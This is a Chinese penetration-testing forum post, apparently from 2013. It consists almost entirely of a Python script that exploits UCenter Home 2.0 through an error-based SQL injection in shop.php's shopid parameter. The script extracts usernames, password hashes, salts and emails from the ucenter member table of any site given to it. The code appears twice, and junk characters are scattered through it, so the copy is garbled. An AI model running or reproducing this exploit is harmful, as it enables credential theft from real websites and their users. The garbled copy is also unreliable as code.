找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 UCenter Home 2.0 EXP
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1998|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl* q& i" z* J5 E- G
# n( W# @* J2 M1 w" Q( [5 m0 B' w- N0 C

- C& q5 c5 c. P' r' p3 P0 `7 K#!/usr/bin/env python  
7 R7 y9 Z3 Q/ a+ F* \2 z% G* B9 ] 8 d% a( N' e1 I; B
import sys  
% v" ?) h% f$ }& Iimport urllib2  $ ]- x$ |/ F- t; k5 s8 z  X0 B# R" C( O
import re  
2 y. x+ ?: i9 F4 M$ W' S! v6 g " P/ l" p3 y% x& D& ~7 b
def info():  : [2 y: v- ?+ `5 l* z( V4 a5 \
    print 'From:http://www.exploit-db.com/exploits/14997/'   P, ~$ P5 C/ l. @/ d
    print 'http://www.hake.cc/Web_loudong/'
. }6 M5 m9 T+ w  S; L: H4 p    print 'changed:qiaoy'  
" {7 x% z8 y5 D2 j# ~. l$ g    print 'exp:'  
2 L2 @2 U  |3 w$ z7 y' h' {    print ' ./UCenter_Home_2.0.py site'  4 c/ F. G0 e: V6 x: i
" k0 @4 z" P% G  c- Y8 o
def main():  
8 B2 c, p- }$ M( p    if len(sys.argv) != 2:  9 ]* G2 O9 w4 p: m4 W9 b3 H
        info()  # d/ Q# y7 T0 a9 \4 L4 Y
    else:  
& j' E; J9 s* L' |% A2 ?        site = sys.argv[1]  ; D4 U  p5 y5 [$ j& y
        if site[0:7] == 'http://':  
* {& ]6 w. Q1 D3 N3 A9 p- R! M            sitesite =site  3 {& b' Y8 W% N6 u  c* k# {
        elif site[0:8] == 'https://':  * {: K3 d4 t1 ^2 E' a( p0 {+ q, }
            sitesite = site  . j* S! `- Q# u. m0 V
        else:  + S4 s6 R7 |* \: h8 Z) v% @
            site = 'http://'+site  * a* S" ?% @( t
        try:  
! W; Z: P* z/ v, k- G* o" y3 f9 v! r            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  / Q+ p) P4 s/ C; F$ D: K+ O" [
            Value = urllib2.urlopen(url).read()  ! b& \3 y$ L; z( V& Q
            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  
- p1 o7 g& X; B' `% I! d/ ?+ i            hacked = Msg.split(':')  
/ K, e  ]% j7 x, F9 I  f9 W+ }            print 'Name:    '+hacked[1]  1 L/ I# O' p2 y% O7 S3 B! x
            print 'Passwd:  '+hacked[2]  , [  W0 A4 W+ o; o7 F: u% V
            print 'salt:    '+hacked[3]  1 J8 K) y$ u: E  a/ P
            print 'email:   '+hacked[4]  4 m2 \6 x% M6 y4 y& i( h
        except:  
! g: K. h! D* k: h            print 'Sorry,I can\'t work............'  . _& @: M6 }- a5 I

# i3 K/ h  [, b3 V  v, a( i. X' rif __name__ == '__main__':  8 n& l! U% H8 }# I# A2 u4 @. R: D
    main()
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表